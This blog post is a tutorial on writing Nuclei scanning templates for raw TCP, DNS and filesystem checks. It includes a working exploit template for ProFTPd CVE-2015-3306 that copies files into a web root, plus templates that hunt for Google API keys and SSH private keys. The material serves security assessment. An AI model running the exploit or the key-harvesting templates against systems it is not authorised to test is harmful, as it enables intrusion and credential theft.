Nuclei beyond HTTP: Using Nuclei to uncover vulnerabilities in raw TCP connections, DNS, files and more!

Nuclei beyond HTTP: Using Nuclei to uncover vulnerabilities in raw TCP connections, DNS, files and more!

Hey there, fellow hackers! Are you ready to take your Nuclei skills to the next level? Buckle up, because in this blog post, we're going to explore the vast possibilities of Nuclei beyond its popular use with HTTP. Nuclei, developed by ProjectDiscovery, is a powerful and versatile tool that can help you uncover vulnerabilities. In this article, you'll learn how you can leverage Nuclei for various protocols and make your security assessments even more robust!

Beyond Basic HTTP Requests

Despite what many think, Nuclei isn't limited to basic HTTP requests. In fact, it's not even limited to HTTP! By understanding and utilizing Nuclei functionality effectively, you can widen the scope of your scans, covering services beyond web servers. Here's a breakdown of a few protocols supported by Nuclei:

  1. TCP: Nuclei can act as an automatable Netcat, enabling you to send and receive bytes across the wire while providing matching and extracting capabilities on the response.
  2. DNS: Using Nuclei you can send fully customizable DNS requests and perform matching and extracting operations on their responses.
  3. Files: Nuclei goes beyond the network and DNS layers by providing support for file-based assessments. With file-based templates, you can match and extract data directly from the filesystem, adding an extra layer of depth to your security scans.
  4. Headless: Nuclei supports browsing with a headless browser, which enables you to detect vulnerabilities that only reveal themselves after executing JavaScript in a browser, such as DOM XSS.

Now that we've covered the different protocol support in Nuclei, let's take a closer look at each protocol and see how you can leverage them effectively in your security assessments.

Sending Raw TCP Requests

Nuclei's network protocol support brings a whole new level of flexibility to your security assessments. You can think of it as an automatable Netcat, allowing you to send and receive bytes while performing matching and extracting operations on the response.

A basic network template with a word matcher could look like this:

id: basic-network-request

info:
  name: Basic Network Request
  author: pdteam
  severity: info

tcp:
  - host:
      - {{Hostname}}
    inputs:
      - data: "PING\r\n"
    read-size: 4
    matchers:
      - type: word
        part: data
        words:
          - "PONG"

This template connects to {{Hostname}} via a raw TCP connection, sends "PING\r\n", then reads 4 bytes from the response. In this case, the template is looking for the word "PONG" in the response.

Using TLS

You can make TLS requests by adding a tls:// schema at the start of the hostname, for example: tls://example.com.

Sending hex data

You can send raw hex data by specifying "hex" as the type in the input. You can also specify the output encoding for matchers. Here's an example from the Nuclei docs.

id: hex-network-request

info:
  name: Hex Input Network Request
  author: pdteam
  severity: info

tcp:
  - host:
      - "{{Hostname}}"
    inputs:
      - data: "50494e47"
        type: hex
      - data: "\r\n"

    read-size: 4
    matchers:
      - type: word
        part: data
        encoding: hex
        words:
          - "504f4e47"

Sending multi-step requests

You can also send multi-step requests, as demonstrated by this template, which exploits CVE-2015-3306, an RCE against ProFTPd.

id: CVE-2015-3306

info:
  name: ProFTPd RCE
  author: pd-team
  severity: high
  reference: https://github.com/t0kx/exploit-CVE-2015-3306
  tags: cve,cve2015,ftp,rce

tcp:
  - inputs:
      - data: "site cpfr /proc/self/cmdline\r\n"
        read: 1024
      - data: "site cpto /tmp/.{{randstr}}\r\n"
        read: 1024
      - data: "site cpfr /tmp/.{{randstr}}\r\n"
        read: 1024
      - data: "site cpto /var/www/html/{{randstr}}\r\n"
    host:
      - "{{Hostname}}"
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Copy successful" 

Crafting DNS Requests

With Nuclei, you can fully customize DNS requests and perform matching and extracting operations on the DNS responses. This can be extremely useful for detecting DNS takeovers and general DNS reconnaissance tasks.

This example simply detects if there is a CNAME record for the specified fully qualified domain name.

id: basic-dns-example

info:
  name: Test DNS Template
  author: pdteam
  severity: info

dns:
  - name: "{{FQDN}}"
    type: CNAME
    class: inet
    recursion: true
    retries: 3
    matchers:
      - type: word
        words:
          # The response must contain a CNAME record
          - "IN\tCNAME"

File Protocol: Delving Into Filesystem Assessments

Nuclei not only excels in network and DNS assessments but also extends its capabilities to the filesystem level. By using file-based templates, you can match and extract information directly from files. This might be used to uncover vulnerable code patterns, API keys, or sensitive file types.

Here's an example of a file template that finds Google API keys in files.

id: google-api-key

info:
  name: Google API Key
  author: pdteam
  severity: info

file:
  - extensions:
      - all
      - txt

    extractors:
      - type: regex
        name: google-api-key
        regex:
          - "AIza[0-9A-Za-z\\-_]{35}"

Recursiveness and denylist

You can specify "no-recursive: true" which will stop nuclei from searching through directories recursively. You can also specify a "denylist" which will ignore files with the extensions specified in the "denylist" array.

In the template below, files with the "pub" extension will be ignored and only files in the root directory will be scanned.

id: ssh-private-key

info:
  name: SSH Private Key Detect
  author: pd-team
  severity: high

file:
  - extensions:
      - all
    denylist:
      - pub
    no-recursive: true
    max-size: 1024 # read very small chunks

    matchers:
      - type: word
        words:
          - "BEGIN OPENSSH PRIVATE KEY"
          - "BEGIN PRIVATE KEY"
          - "BEGIN RSA PRIVATE KEY"
          - "BEGIN DSA PRIVATE KEY"
          - "BEGIN EC PRIVATE KEY"
          - "BEGIN PGP PRIVATE KEY BLOCK"
          - "ssh-rsa"

Conclusion

Congratulations! You've now expanded your knowledge of Nuclei beyond just HTTP. In this blog post, we explored the possibilities of creating raw TCP requests, DNS requests and file system scans. Each of these features brings unique capabilities to the table, allowing you to uncover more vulnerabilities!

If you want to continue levelling up your nuclei knowledge, the best place to look is the nuclei docs and more specifically, the nuclei templating guide.

Stay tuned for more exciting content and advanced techniques to maximize your cybersecurity arsenal. Until then, keep exploring, learning, and safeguarding the digital realm!

Author - Luke Stephens, @hakluke

Subscribe to our newsletter and stay updated.

Don't miss anything. Get all the latest posts delivered straight to your inbox. It's free!
Great! Check your inbox and click the link to confirm your subscription.
Error! Please enter a valid email address!
--